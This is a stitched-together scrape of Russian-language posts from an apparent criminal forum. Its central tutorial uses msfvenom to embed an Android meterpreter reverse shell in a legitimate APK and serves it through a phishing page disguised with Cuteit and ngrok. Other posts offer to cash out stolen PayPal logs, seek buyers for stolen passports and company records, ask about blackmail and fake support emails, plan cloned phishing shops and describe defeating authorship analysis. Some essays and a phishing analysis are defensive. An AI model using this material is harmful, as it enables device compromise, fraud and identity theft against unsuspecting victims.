Секретные вопросы для восстановления доступа это плохо, этот факт известен давно, но порой данный метод встречается даже в таких серьезных сервисах как Яндекс ПДД. Вообще, эту особенность нельзя назвать уязвимостью, но она серьезно снижает безопасность. При аудите любого веб-приложения протокол восстановления доступа является тем, на что стоит обратить пристальное внимание. Так же интересным показался факт, что недостаток устраненный в сервисе для широкого круга пользователей остался в мелко-корпоративном сегменте.
Джереми Гроссман на конференции BLACK HAT USA 2019 рассказывал о том, что классические критические уязвимости веб-приложений сейчас встречаются все реже, а эксплуатировать их становится намного сложнее. LFI или SQL-inj на серьезных сервисах являются редкостью. В тренде становятся атаки на бизнес- процессы и логику приложений. Такие ошибки практически нереально найти автоматическими средствами, от них не защититься с помощью WAF. Рассмотренный в статье метод является прекрасной иллюстрацией сказанного.
Ссылки
1. Про фичи PDD - https://connect.yandex.ru/pdd/
2. Документация к API - https://yandex.ru/dev/pdd/doc/about-docpage/
3. Как происходит маршрутизация почтовых сообщений -
https://ru.wikipedia.org/wiki/SMTP
4. Перевод доклада об актуальных методах атак c конференции BLACK HAT USA
2019 - https://habr.com/ru/company/ua-hosting/blog/476088/
5. Модуль для работы с API Яндекс PDD на Python -
https://github.com/zt50tz/yandex-pdd
Пишите свои варианты, аргументация и развитие темы приветствуются.
Как достать смску у пользователя,если нет доступа к телефону?
Старт темы - отредактировано модератором.
Есть такая контора, называется Jumio, они делают фото и видео идентификацию
людей по ту сторону экрана.
Они используют SDK FaceTec, технокомпания, которая разработала одну из самых
защищенных фич снятия биометрии, об этом ниже.
А пока, давайте бегло пробежимся че творится только лишь в рунете, буржунет я даже не хочу анализировать, так уже почти все произошло:
CVV дампы, даже фулки, умрут:
Глобальная платформа SaaS-market.net стала реселлером продуктов американской компании Jumio в России. SaaS-market.net будет представлять на российском рынке два облачных продуктаJumio — Netswipe and Netverify , которые позволяютпредотвратить факты интернет-мошенничества и обеспечить сохранность личных данных.
Так, платежный сервис Netswipe производит сканирование банковской карты с помощью любой веб-камеры и затем списывает средства со счета для онлайн- оплаты товаров и услуг. Чтобы произвести платеж, пользователю необходимо поднести банковскую карту к своей веб-камере, которая считывает данные. Затем сервис перенаправляет пользователя на страницу подтверждения, где нужно ввести CVV-код и произвести платеж. Благодаря собственной запатентованной технологии Jumio обеспечивает удобство и безопасность безналичных платежей.
Click to expand...
Веб камера как замена POS терминала:
Не особо известный сервис онлайн-платежей Jumio предложил интересное решение, позволяющее упростить процесс оплаты товаров и услуг в Сети. Команда разработчиков из Jumio создала сервис, который превращает веб- камеру в POS-терминал (по словам создателей сервиса — защищенный от внешних воздействий терминал). Для того, чтобы совершить оплату товара или услуги, достаточно будет поднести кредитку к объективу веб-камеры (лицевая сторона), введя затем CVV-код.
Click to expand...
Платежная система «Мир » рассматривает возможность запуска проекта по оплате покупок с помощьюбиометрии лица. Для такого платежа не нужны будут наличные или карты. Технология в целом более безопасна, чем карты, но у нее есть свои минусы.
Click to expand...
О степени защиты от подделок:
Для проведения безопасных транзакций с использованиембиометрических терминалов необходимо использовать не только алгоритмы распознавания лиц, но и алгоритмы определения живого человека (liveness detection) или инфракрасную камеру, что может негативно сказаться на стоимости терминала, предупредили в пресс-службе Тинькофф Банка.
То, что перед камерой находитсяживой человек, а не его фотография, видеозапись или видеосвязь , наиболее надежно может определитьбиометрия по лицу в формате 3D , указывает Горшков. Для этого используется стереокамера, которая позволяет «различить плоский и объемный объект, используя мультиспектральный анализ рисунка вен ладони или радужной оболочки глаз, дополнительно контролируя наличие пульсации крови и непроизвольные микродвижения.
Click to expand...
Совместно с компанией «Ростелеком» Банк России запустил удаленную идентификацию по биометрическим данным. Теперь новые клиенты банков по снимку лица и записи голоса смогут открывать счета и вклады, получать кредиты или переводить деньги, не выходя из дома, только при помощи смартфона или компьютера. О принципах работы и надежности системы представители «Ростелекома» и Банка России рассказали на встрече с журналистами.
Click to expand...
Сейчас на российском рынке существует несколько проектов, которые позволяют оплачивать покупки с помощью биометрии. Около года назад компания VisionLabs и российская платежная система SWiP запустили сервис по оплате покупок с помощью селфи SelfieToPay в сети общепита «Пять звезд» и Mediacafe в Москве. Летом к системе добавились сеть пиццерий Papa John’s и кофейни Cofix.
Click to expand...
Безопасность услуг гарантирована «Ростелекомом». Во-первых, данные из двух систем хранятся отдельно, они максимально обезличены. Во-вторых, работает технология Liveness , которая способна определить подделку. Это защитит от мошенников , которые захотят воспользоватьсязаписью голоса или снимком клиента банка. В будущем разработчики хотят ввести считывание отпечатка ладони и сетчатки радужки. Это позволит комбинировать разные факторы — голос и сетчатку, ладонь и фото, что даст дополнительную защиту клиентам банков.
Click to expand...
Совещание в одной корпорации:
— … таким образом мы можем управлять всеми нашими системами по всему миру удаленно и автоматически.
— Хорошо, а теперь как нам управлять всеми людьми?
— Мы им скажем: «А докажи что ты не робот!?»Click to expand...
Совсем скоро, корпорации будут контролировать всех людей, иметь базу данных лиц жителей разных стран, определять по лицу ваше настроение, состояние, продавать ваши лица в другие корпорации, чтобы выписывать вам мази от кругов под глазами, определять месячные и беременность у женщин, разыскивать ваши лица по видео-записям всех публичных веб-камер и устройств слежения, определять вас на входе в магазины, передвижения по городу… и это лишь малый список того, до чего додумалось мое воспаленное воображение.
Не за горами то время, когда пароли практически исчезнут, а для совершения действий в интернете, необходимо будет показать свое лицо и выполнить какой- либо приказ, написанный на экране.
Click to expand...
Jumio активно внедряется:
В качестве своего KYC Coinbase выбрала решение цифровой идентификации Jumio Netverify, чтобы попытаться удовлетворить нормативные требования и при этом обеспечить бесперебойную работу с клиентами.
Click to expand...
Опа, а вот уже и FindFace подтянулся, чтобы детектить фейк по всему интернету и подставных дропов:
Лучшая система распознавания и идентификации лиц для казино и индустрии развлечений. Технология применяется для удаленной идентификации в банкоматах, камерах видеонаблюдения, камерах на устройствах клиента по биометрическим данным.
![findface.pro](/proxy.php?image=https%3A%2F%2Fntechlab.ru%2Fwp- content%2Fuploads%2Fsites%2F3%2F2023%2F04%2Fcropped-512h512-32x32.png&hash=68d585e5168f7bccfcf522877d728535&return_error=1) findface.pro
Обеспечивает достоверные данные о визитах и действиях покупателей в торговом зале. Анализируйте нужные группы клиентов, проводите эффективные расследования краж и правонарушений.
Собственная технология детектирования 2D Liveness предотвращает взлом системы распознавания лиц FindFace. Отличает живого человека перед камерой от фотографии или видеоизображения.
Click to expand...
Почему FaceTec и Jumio особенно очень опасны? Просто посмотрите эти видео:
Че скажете?
Кто сможет сюда подсунуть видео и пройти верифик ?
https://browser.zoomlogin.com/
Отработаю логи с линкой PayPal
Условия:
-Наличие куков и пароля в логе от палки
-Логу должно быть не больше месяца
-Не отработка
-Лог не СНГ.
-В должен быть IP
Контакты:@CAN4EZ254TELEGRAM)
Заливаю на алертс стримеру, стримеру идет % с моих денег. Сумма вашего профита
зависит от логов, бывает что с 1 лога можно вытащить от 10000
30минут и деньги уже у вас на карте
Для начала, нам необходимо будет скачать какой-нибудь APK файл не более 5 мб, для этого идём на 4PDA, ищем там что-нибудь подходящее и качаем, я использую софт для загрузки музыки из вк.
Теперь открываем терминал и прописываем:
Code:Copy to clipboard
msfvenom -x '/директория где находится файл который мы будем заражать/DownloadMusic-1.5.apk' -p android/meterpreter/reverse_tcp LHOST=(ip вашего компа) LPORT=8080 -e x86/shikata_ga_nai -i 10 -o название итога.apk
-x - использовать такой то файл
-p - прилепить пейлоад
-o - назвать получившийся файл так-то
-e - зашифровать от обнаружения антивирусами
-i - количество "слоёв" шифрования
Жмём Enter и ждем, когда веном либо выдаст ошибку, либо скомпилирует файл.
Если выдает ошибку, обновляем версию APKtool. Если не помогло, ищем другую АПкашку для заражения.
Теперь используя фишинг и СИ, сделаем простенькую страничку для нашего софта.
Страничку можно создать, используя конфигураторы сайтов либо использовать исходник приложенный ниже. Если вы используйте конфигуратор, знайте, что он прилепит к ней вагон ненужного кода, и прочий мусор.
Исходник ( Облако Mail )
pass - social_engineering
Содержимое папки Social по адресу /var/www/html
(APK, который мы заразили,
помещаем туда же)
Если не отображается картинка, необходимо предоставить доступ пользователю для чтения и записи в папке www.
Click to expand...
Открываем файл index.html при помощи текстового редактора и исправляем все
надписи на нужные вам, в частности <a href="forgo.apk">Установить</a>
forgo меняем на название вашего файла.
В терминале пишем
Code:Copy to clipboard
sudo systemctl start apache2
Как всё запустится, открываем браузер, вводим в адресную строку свой ИП.
Для того, чтобы наш ИП стал похож на веб адрес, нам понадобится программа
Cuteit, которую мы скачаем с гитхаба
https://github.com/D4Vinci/Cuteit.git
там можно тупо следовать инструкции из файла readme
переходим в папку с кутитом через терминал и прописываем команду
Code:Copy to clipboard
python ./Cuteit.py ваш ИП например 123.15.46.54
Получаем такую картину:
Выбираем любую ссылку, вводим в адресную строку и попадаем на наш сервер.
Но в адресной строке в тот же момент появляется палево, в виде нашего ip.
Это мы победим при помощи Ngrok.
Идем по ссылке:
https://ngrok.com/download
Качаем, регистрируемся и следуя инструкции, добавляем ключи, иначе не будет работать как нужно.
Когда всё готово, через терминал переходим в папку с ngrok и прописываем
Code:Copy to clipboard
sudo ./ngrok http 80
Наши рабочие ссылки в строке Forwarding
Готово.
del
Если шантажировать на бабки людей за бугром , стоит ли боятся копов ?
Куда можно слить паспорта , права ,документы на ооо , (общество с ограниченной
ответственностью), их счета, договора
ну собственно с профитом) )
привет всем. киньте плиз готовый фейк под мыло? типа от саппорта запрос на вериф или обычный дефолт. спасибо
пысы. ломается верстка
В последнее время я стал замечать, что вокруг меня становится всё больше людей, у которых всё заметнее разница в развитии между «традиционным» интеллектом и «социальным» (или, если хотите, эмоциональным). Но обо всём по порядку.
В 1920 году американский психолог Эдвард Ли Торндайк ввёл термин «социальный интеллект» , который описывает способность правильно понимать поведение людей. Данная способность, развитая человеком в результате эволюции, необходима для эффективного взаимодействия между представителями нашей расы и успешной социальной адаптации новых её членов.
В 1937 году другой американский психолог, Гордон Олпорт , автор «теории черт личности», связывал социальный интеллект со способностью высказывать быстрые, почти автоматические суждения о людях, прогнозировать наиболее вероятные реакции человека.
По его мнению, «социальный интеллект» — это особый дар, позволяющий нам приспосабливаться к социуму и облегчающий взаимоотношения с людьми.
Click to expand...
Да простят меня дотошные психологи, но к социальному интеллекту, в контексте нашей современной жизни, я бы добавил и другой термин — «эмоциональный интеллект». Ведь выражение эмоций в подавляющем большинстве случаев является социальным инструментом.
В подтверждение социальной роли эмоций говорит хотя бы то, что мимика у слепых от рождения людей чрезвычайно бедна.
Термин «** эмоциональный интеллект»** (EI), введённый в 1990 году Питером Сэловеем и Джеком Майером , описывает способность человека распознавать эмоции, определять их происхождение и роль, генерировать и управлять ими ради эмоционального и интеллектуального роста.
Коэффициент EI, в отличие от всем понятного IQ, описывает способность человека правильно истолковывать обстановку и оказывать на неё влияние, интуитивно улавливать то, чего хотят и в чём нуждаются другие люди, понимать их сильные и слабые стороны, не поддаваться стрессу и быть обаятельным.
Так вот, возвращаясь к началу данной статьи, многие психологи в последнее время приходят к тому, что уровень «общего» интеллекта никак не коррелирует с уровнем социального интеллекта.
Шэлдон Купер , один из главных героев «Теории большого взрыва» —
классический пример человека с высоким IQ (в фильме называлось число 187) и
низким «социальным интеллектом».
Высокий интеллектуальный уровень является необходимым, однако отнюдь не достаточным условием социального развития личности, то есть он может помогать социальному развитию,но не замещать его.
Более того, высокий интеллект может полностью обесцениваться, в случае, когда его обладатель страдает** «социальной слепотой»** .
Наверняка у многих из вас есть примеры того, как умный парень (или девушка), общаясь, ведёт себя слегка неадекватно (не вписывается в «волну», на которой находятся все остальные) и провоцирует негативное отношение к себе.
Да что там, такие «фэйлы» наверняка были в жизни каждого из нас — неудачная шутка, неуместный смех или любая другая ситуация из нашего неудачного социального опыта.
Человек, настроенный на повышение своего социального интеллекта, постарается в деталях запомнить эту ситуацию, разобрать её «по косточкам» (что было «до», что было «после», почему такое произошло, как мне на самом деле следовало себя вести и так далее), чтобы усвоить опыт и не совершать этих ошибок в дальнейшем.
Результат осознания данного события закрепляется в когнитивных структурах психики в виде навыков, и чем больше у человека этих навыков, тем проще ему быть «своим» в социуме и достигать своих собственных целей, используя окружающих.
Как развить в себе социальный интеллект
1. Прокачивайте социальную восприимчивость
Основа социального интеллекта — эмпатия или «социальная восприимчивость». Ключ
к развитию этого навыка лежит в том, чтобы выйти за рамки своего эгоизма и
обратить внимание на других людей. Более того, лучше не просто обратить на них
внимание, а сконцентрироваться на том, что делает объект вашего наблюдения,
как он это делает, зачем он это делает и так далее.
Нам, жителям мегаполисов, тренироваться в этом достаточно просто — спускайтесь в метро и не спешите утыкаться в смартфон с Angry Birds.Просто осмотритесь и выберите 3-4 человек для наблюдения.
Постарайтесь представить, куда они едут, какие мысли у них в голове. Понаблюдайте за их мимикой: какие эмоции в данный момент они испытывают? Постарайтесь представить, как этот человек разговаривает с другими, о чём спорит, как при этом будут проявляться его эмоции.
Со временем вы вдруг поймёте, что морщины на лице объекта вашего внимания довольно быстро начнут сами собой оживать в вашем воображении и «оживлять» спокойное лицо улыбкой или недовольной гримасой.
2. Учитесь разбираться в языке тела
Современный человек — существо довольно скрытное, поэтому для того, чтобы
лучше разбираться в том, что человек чувствует и какие мысли у него в голове,
неплохо научиться читать «язык тела». Тут можно не изобретать велосипед и
прочитать книжку Алана Пиза «Серия «А и Б = Формула успеха»». Ну или в
качестве краткой «шпаргалки» — 75 признаков языка
тела по Максу Эггерту.
3. Учитесь читать эмоции по лицу
Согласно анатомическому атласу, у нас на лице 57 мышц. Благодаря этому наше
лицо само по себе является мощным инструментом для коммуникаций, причём язык
мимики зародился ещё до того, как в результате эволюции развился речевой
аппарат. Соответственно и навыки чтения по лицу лежат в нашей генетической
памяти глубже, чем лингвистические «надстройки», что делает их более
универсальными.
Если вы смотрели сериал, снятый по мотивам книги Пола Экмана «Обмани
меня », или даже читали саму книгу, то через некоторое время вы начнёте
замечать, что большая часть наблюдений профессора Калифорнийского университета
очень похожа на правду.
4. Учитесь слышать
Слушать умеют большинство людей, однако вот слышать — далеко не все. Слушая
собеседника, постарайтесь не просто выуживать только ценную для вас информацию
(как вы это обычно делаете), а представлять через этот рассказ ту
реальность, в которой живёт ваш визави. Не бойтесь задавать наводящие
вопросы и дополнять эту реальность новыми деталями.
Через некоторое время вы будете удивлены тем, что в глазах собеседника ваш авторитет начнёт расти. Почему? Ведь вы ничего ему не рассказали, а только слушали и задавали наводящие вопросы!
5. Учитесь улавливать настроение
Настроение людей — очень полезный индикатор для определения своевременности
того или иного социального воздействия, необходимого вам. И навык быстрого
определения настроения другого человека по обрывочным, на первый взгляд,
сведениям, поможет вам оперативно скорректировать ваше поведение.
Вспомните, как в детстве по громкому хлопку двери и недовольному покашливанию в коридоре вы узнавали, в каком настроении пришёл ваш отец. Вам хватало всего нескольких косвенных признаков, чтобы понять, стоит ли давать дневник с двойкой на подпись или подождать, пока родитель поужинает и подобреет.
Комбинация навыков, прокаченных в чтении эмоций и языка тела, умение слушать, позволят вам с высокой точностью определить настроение нужного вам человека.
Click to expand...
6. Прокачивайте свой актёрский талант
После того как вы немного освоите все вышеперечисленное, начинайте развивать
свои актёрские таланты. Потому как одним из важных навыков социального
интеллекта является способность приспосабливаться, подстраиваться под
окружение.
И не стоит тут цитировать известную песню Макаревича «Однажды мир прогнётся под нас» — если наша цель состоит в том, чтобы научиться управлять социумом вокруг себя, то способность правдиво играть нужную в данный момент роль становится незаменимым инструментом.
А вышеупомянутый Гордон Олпорт и вовсе называл социальное приспособление ключевым продуктом социального интеллекта.
Вы можете быть большую часть своей жизни брутальным мачо, но если вам надо успокоить девочку, потерявшую своих родителей в толпе торгового центра, то вам придётся достать из глубин своей души розового пони и дать этой девочке увидеть его.
7. Научитесь управлять своими эмоциями
Те, кто увлекается фотографией, наверняка замечали, что спустя несколько тысяч
кадров появляется интересный феномен — вы начинаете смотреть на окружающий вас
мир как бы через видоискатель фотоаппарата, оценивать, насколько эта
«картинка» интересна не тебе, а твоим друзьям или знакомым. То есть вы
начинаете смотреть на этот мир как бы со стороны, точка восприятия
реальности вдруг выходит за границы вашего сознания и оказывается где-то на
вашей странице Facebook или ЖЖ.
Так вот, с вашими эмоциями надо научиться делать то же самое. Если вдруг вы почувствовали, что гнев, ярость, зависть, скорбь или другое сильное чувство, которое вы хотели бы взять под контроль, начинает проявляться, сместите центр восприятия реальности и взгляните на себя со стороны («А кто это такой гневный с такими смешно сморщенными губами?»). Взгляните на источник этой эмоции — к примеру, на вызвавшего ярость таксиста, вклинившегося в ваш ряд без поворотников и чуть не снёсшего вам половину бампера — и представьте, как он втянул голову в плечи, ожидая вашей негативной реакции. Вам станет легче.
Если же кто-то намеренно спровоцировал в вас ту или иную эмоцию (к примеру, есть люди, специально устраивающие эмоциональные «качели», чтобы узнать, что за человек перед тобой — им так проще общаться), то разберитесь, зачем этому человеку понадобилось вызывать ваш гнев (жалость, страх или смех). Возможно, вам с ним не по пути?
Не стоит забывать, что эмоции — отличный инструмент для манипуляций. Но прежде чем учиться с их помощью манипулировать другими, убедитесь, что свои эмоции вы держите под полным контролем.
8. Прокачивайте навыки публичных выступлений
Человек, который не постеснялся сделать доклад на конференции, произнести тост
на свадьбе или задать неудобный вопрос на общем собрании дачного кооператива,
как минимум, на какое-то время завладел вниманием нескольких слушателей. А как
максимум — смог вложить в их головы нужные ему мысли.
Если вы боитесь выступать публично, то обязательно пройдите курсы «Искусство презентации» или «Ораторское искусство», которых сейчас полно (как групповых, так и индивидуальных). Только во время публичных выступлений можно увидеть, как волнами меняется настроение слушателей, какие слова вызывают сильные эмоции, как меняется внимание и так далее.
Даже если вам не придётся делать доклад перед Советом Федерации, полученные навыки обязательно пригодятся вам в повседневной жизни.
Click to expand...
9. Играйте в «Мафию», «Монополию», покер и другие «социальные» настольные
игры
Несмотря на кажущуюся «несерьёзность» этого метода прокачки социального
интеллекта, именно в настольных играх характеры людей начинают «играть
красками», а если игра проходит в непринуждённой обстановке и с некоторым
(умеренным) количеством алкоголя, то кроме весёлого настроения вы получите ещё
и целый набор социальных навыков по чтению эмоций, определению лжи по
косвенным признакам, сокрытию собственных эмоций и так далее.
Заключение
Если вы самонадеянно считаете, что эти рекомендации не для вас и у вас-то с
социальным интеллектом всё в полном порядке, то не обольщайтесь.
Развитие социального интеллекта — процесс бесконечный.
А если мы будем лениться и постепенно выстраивать вокруг себя «лояльное» окружение, забыв о тренировках социального интеллекта, то рано или поздно придёт мальчик, который вдруг покажет на вас: «А король-то голый!».
И, вероятнее всего, у поколения «рождённых в интернете» будут свои стандарты и оценки коэффициента EI.
В качестве примера того, как меняются социальные коммуникации, можно привести интересный обычай, существовавший каких-то 400 лет назад (во времена Шекспира) между мужчинами и женщинами: любовники были настолько одержимы запахом тел друг друга, что женщины нередко держали под мышкой очищенное яблоко до тех пор, пока оно не впитывало в себя их пот и запах. Они отдавали это «яблоко любви» своим партнерам, чтобы они могли вдыхать его аромат в их отсутствие.
Поэтому вполне возможно, что наши дети будут смотреть на наши социальные обычаи с такой же брезгливостью, как мы смотрим на этих любителей «яблок любви».
Литовец Эвальдас Римасаускас (Evaldas Rimasauskas) обманом получил от Google и Facebook более 100 миллионов долларов. Он присылал компаниям поддельные счета за услуги и продукты, которые они не получали, и требовал оплату. Мошенничество продлилось с 2013 по 2015 год, однако подробности дела стали известны только в марте 2019 года из отчёта Министерства юстиции США.
Как работала схема
По данным американского ведомства, основой схемы Римасаускаса стала компания Quanta Computer Inc, которую он зарегистрировал в Латвии. Её название [соответствовало](https://www.bloomberg.com/news/articles/2019-03-20/man- pleads-guilty-in-100-million-scam-of-facebook-and-google) названию китайского производителя компонентов.
Используя схожесть названий, Римасаускас заставил сотрудников Facebook и Google поверить в то, что его компания выступает их подрядчиком. Для этого мошенник в том числе подделал адреса электронной почты, сфабриковал контракты, счета и переписки с сотрудниками корпораций.
Мужчина также использовал документы, заверенные поддельными печатями организаций — их мужчина предоставлял в банки, чтобы одобрять переводы. Для отмывания денег он также открыл несколько счетов в банках Кипра, Литвы, Венгрии, Словакии и Латвии.
После успешного получения средств Римасаускас переводил их на счета в разных странах, чтобы скрыть денежный след. По [данным](https://www.reuters.com/article/us-cyber-fraud-tech/lithuanian- pleads-guilty-in-u-s-to-massive-fraud-against-google-facebook-idUSKCN1R12FB) Reuters, с 2013 по 2015 годы таким способом мошенник получил 23 миллиона долларов от Google и почти 100 миллионов долларов от Facebook.
В отчёте Минюста США не раскрыли названия пострадавших компаний, однако в Google подтвердили изданию Bleeping Computer, что стали жертвой схемы Римасаускаса. Представители компании отметили, что обнаружили мошенничество и сообщили о нём властям. В Google пояснили, что вернули назад украденные средства.
Щепотка логики.
Листал самоучитель анонимности в интернете Дениса Колесниченко и нашел интересную главу про лингвистический анализ. С помощью лингвистического анализа можно установить, что два разных текста принадлежат одному лицу. В случаях когда есть конкретное лицо, которое могло быть или претендует на авторство письменного текста, и есть литературные произведения, достоверность создания которых данным автором не вызывает никаких сомнений, проводится сопоставительный анализ с целью идентификации автора письменного текста.
Если нет предполагаемого автора, определяется так называемый «индивидуальный личностный профиль» автора. В этом случае определяются данные о степени владения языковыми навыками, данные об образовании, родном языке, половозрастной принадлежности автора письменного текста и т.п. характеристиках.
Такие данные о речевом или лингвистическом портрете автора анонимного текста могут помочь его разыскать.
По письменному тексту может быть решена задача разграничения автора и исполнителя документа, выявлены ложные «чистосердечные признания», написанные под диктовку или под воздействием других лиц, определены признаки необычного эмоционально-психологического состояния автора (или исполнителя) письменного текста (наркотическое или алкогольное опьянение, состояние стресса, речь под дулом пистолета и т.п.).
Как вычисляют по стилю письма?
Обращается внимание на:
На основании всего этого формируется некая математическая модель с которой сравниваются другие тексты. Обойти лингвистический анализ поможет синонимайзер или даже гуглопереводчик. Если перевести текст с русского на английский а затем опять на русский структура текста будет безнадежно поломана что нам и нужно. Синонимайзер поможет вам подобрать синонимы к словам в тексте чем тоже нарушит статистику. Замены слов будут подсвечены синонимайзером, вам только остается заняться корректировкой текста. Обработанный синонимайзером/гуглопереводчиком текст необходимо подравить чтобы придать ему читабельный вид.
Синонимайзеры текста:
www.sinoni.men
www.online-sinonim.ru
www.raskruty.ru/tools/synonymizer/
Привет ребята. Прошу сильно не пинать, а просто по дружески подсказать пару
нюансов по выводу фишинг скам сайта, в первые позиции гугла.
Цель, сбор материала, свежего, валидного.
Я так понял, это можно сделать только исключительно через рекламу гугл
адворда. И если да, то вопрос другой.
Взять к примеру инет магазин по Uk? к примеру не биг шоп, потипу амазонов
ебеев, а к примеру шоп, с спортивной одеждой, который по запросу в гугле, по
Uk, стоит в топ 30 первых сайтов.
Есть идейка, сделать под него фейк, через ошибку в доменном имени, либо псевдо
субдомен, с какой-то акцией от этого шопа, ну типо официал шоп shop.com а я
сделаю egift-shop.com либо, что=то подобное, где будет страница с новой акцией
от этого мага, и выбор егифтов с скидкой под 50-60% от цены. Далее при
чекауте, простая ошибка, что к сожалению егитфы закончилися, приходите поже, и
редирект на официал шоп.
Я так это вижу ( поправьте меня если это глупо).
Это реально? Как смотрит гугл на такие вещи ( ибо я знаю за крипту ту же,
биржи битка так скамят) , но не видит реальных примеров под официальные шопы,
где просто товар.
Чтобы не было затратно, это нужны аки с логов адворда, либо с СС лупить?
Просто хочеться наделать сетку таких фейк шопов, копию офиицальных, с
грабингом контента с официал.
Есть ли на сегодня готовые решения, либо сервисы? Которые не просто смогут
наклепать мне копий, а и настроить это все дело, или хотя бы помощь, дать
советы, и пару ответов в начале пути?
Всем спс кто откликнулся.
Lightshot не является пользовательским приложением, поэтому все скриншоты загружаются в общее облако, доступное для всех. Все, что нужно, - это изменить несколько цифр и букв в указанном URL-адресе, и с каждой итерацией будет появляться новый снимок экрана:
После быстрого просмотра я уже наткнулся на бесчисленное количество ценной личной информации, такой как идентификаторы, квитанции, данные банковского счета и т. Д., Но что привлекло мое внимание, так это следующие учетные данные возможного криптокошелька (валюта BTC):
Из-за убежденности в том, что никто не настолько беспечен, я решил вручную войти на веб-сайт с указанными учетными данными, к моему удивлению, не было запрошено 2FA, и я успешно вошел в систему и обнаружил кошелек BTC с общим объемом 0,88 BTC (оценка 9850 долларов США для Cегодня):
На этом этапе можно с уверенностью сказать, что этот веб-сайт вызывает серьезную тревогу, и за этим должно что-то стоять. При нажатии на кнопку «Снять» веб-сайт отображает следующее сообщение с запросом комиссии 0,0015 BTC из-за снятия:
Дальнейшее изучение истории блокчейна показывает, что на этот кошелек и с него было отправлено 0,133 BTC (всего 197 транзакций):
Теперь совершенно очевидно, что мы наблюдаем новый вектор фишинг-атаки, нацеленный на лиц, которые злоупотребляют утечкой данных Lightshot и пытаются найти уязвимую, конфиденциальную информацию, такую как кошелек BTC, и в конечном итоге сами будут обмануты.
К моменту написания этого поста я уже встречал 5 подобных атак, основанных на утечке данных Lightshot.
Бонус:
1.Злоумышленники «слили» аккаунт georgian33m разными способами, вот
дополнительная фотография якобы невинного разговора в Telegram, на данный
момент очевидно, что это еще одна часть аферы:
2. На момент написания этой статьи сайт все еще был активен. На самом деле на веб-сайте не используются методы аутентификации, страница входа перенаправляется на ту же учетную запись, независимо от того, какой тип учетных данных введен.
3. Вы можете пропустить часть входа в систему и перейти непосредственно к кошельку через / profile:
4. Из исходного кода становится ясно, что это статические элементы HTML, и ни один из них не обновляется:
5. Whois обнаруживает относительно новый домен:
6. Адрес электронной почты службы поддержки (очевидно) не подлежит доставке и не имеет цифрового следа:
Выводы:
В конечном итоге этот новый вектор фишинг-атаки показывает, насколько
уязвимыми могут быть приложения, не предназначенные для пользователей, и как
их общедоступные базы данных могут быть относительно легко использованы для
кражи криптовалюты в этом случае или даже для кражи личных данных. В качестве
наилучшей практики всегда рекомендуется проявлять крайнюю осторожность при
использовании таких приложений и избегать загрузки любых данных, связанных с
компанией (например, снимков экрана, документов и т. Д.), На общий сайт,
доступный для всех и в любом месте.
Источник:<https://medium.com/@shahar_78444/lightshot-phishing-
attacks-97498bea0e22>
Автор перевода: danyrusdem
Переведено специально для XSS.is
Много веков назад монах Шварц Бертольд изобрел «порошочек для забавы», который стал порохом — причиной глобальных войн. Так и инструменты социальной инженерии: они настолько мощные, что используются даже в крупнейших аферах киберпреступников.
В этой статье рассмотрим реальные примеры атак психологическими методами.
Кейс первый. Не в службу, а в дружбу
В 2007 году одна из самых дорогих систем безопасности в мире была взломана.
Без насилия, без оружия, без электронных устройств. Человек забрал из
бельгийского банка ABN AMRO алмазов на 28 миллионов $ своим обаянием.
Мошенник Карлос Гектор Фломенбаум , человек с аргентинским паспортом, украденным в Израиле, завоевал доверие сотрудников банка ещё за год до инцидента. Выдавал себя за бизнесмена, дарил шоколадки. Однажды сотрудники предоставили ему доступ к секретному хранилищу драгоценных камней, оценённых в 120 000 каратов. Позже это дело признали одним из самых громких грабежей.
Мораль истории: неважно, какой вид технологии используется и насколько он дорог — пока есть человеческий фактор, система уязвима.
Click to expand...
Зачастую, как в примере выше, социальному инженеру даже не требуется завоёвывать доверие «жертв» и управлять ими. Достаточно грамотно использовать информацию, которая у всех на виду: почта на рабочем столе, оповещения на экране телефона или мусор. Социальный инженер может получить данные, не оказывая давления на людей.
Кейс второй. Просто попроси
В 2015 году у компании The Ubiquiti Networks украли 40 миллионов $. Никто не
взламывал операционные системы. Никто не крал данные. Правила безопасности
нарушили сами сотрудники.
Мошенники прислали электронное письмо от имени топ-менеджера компании. Они просто попросили, чтобы финансисты перевели большую сумму денег на указанный банковский счёт.
Этот метод социальной инженерии играет на слабостях человека. Например, стремлении услужить начальству.
Click to expand...
Психологи проводили эксперимент (подробнее в книге Роберта Чалдини «Психология влияния», 2009). От лица главного врача они звонили медсестрам, отдавая распоряжение ввести смертельную дозу вещества пациенту. Конечно, медсестры знали, что они делают, но в 95% случаев выполняли команду (на входе в палату её останавливали авторы исследования). При этом личность врача они никак не пытались подтвердить. Почему медсестры делали это? Послушание авторитету. То же случилось в истории The Ubiquiti.
Кейс третий. Фраза, которая потрясла Уолл-стрит
В апреле 2013 года в профиле Twitter информационного агентства The Associated
Press появился поддельный твит, который сильно ударил по мировой экономике.
Перевод: «Срочно: Два взрыва в Белом Доме, Барак Обама ранен»
На этих новостях обвалились биржевые индексы. Ситуация восстановилась, когда
Белый дом опроверг сообщение.
Ответственность за взлом аккаунта взяла на себя Сирийская Электронная армия. Сообщалось также, что до этого хакеры от имени одного из сотрудников AP рассылали «коллегам» письмо с просьбой перейти по очень важной ссылке. Там у пользователя просили авторизоваться, введя логин и пароль. Так злоумышленники хотели получить данные личных аккаунтов сотрудников редакции.
Данная ситуация показывает уязвимость перед подобными кибератаками. Сегодня это The Associated Press, а завтра может быть любая другая компания, от лица которой могут разослать вирусные сообщения, порочащие репутацию.
Преступники разрабатывают новые схемы, — представляются налоговыми инспекторами и вымогают деньги для «погашения долга», или представляются сотрудниками банка и требуют пин-коды.
Никакие обычные средства защиты (антивирусы, файрволлы) не помогут спасти от таких атак.
Click to expand...
Важно создать различные варианты политики безопасности, обучить пользователей, определить правила пользования девайсами внутри компании. А также создать систему оповещения о возможности угрозы, назначить ответственных за техподдержку и организовать двойную проверку.
Я попробую описать несколько нюансов, которые считаю важными.
Для оказания подобного рода услуг, в нынешних реалиях, нужно быть хорошо
подкованным в юриспруденции, знать основы налогообложения и бухгалтерского
учета. Ведь сейчас государство ведет активную чистку в сфере обналички. В
России бум фирм однодневок был в 2008-2009 году. В 2015 году рентабельность
такого бизнеса составляла едва ли 4,5%. В 2016 году комиссия за обнал выросла
до рекордных значений - 15-16% от суммы сделки. Разумеется, что процентная
ставка везде варьируется. Это зависит от многих факторов, таких как:
- Срок исполнения
- Риск блокировки транзакций
- Риск выездной проверки
- Гаранты/посредники
- ОКВЭДы
Что касаемо самих схем, то их множество. Какие-то схемы остаются актуальными,
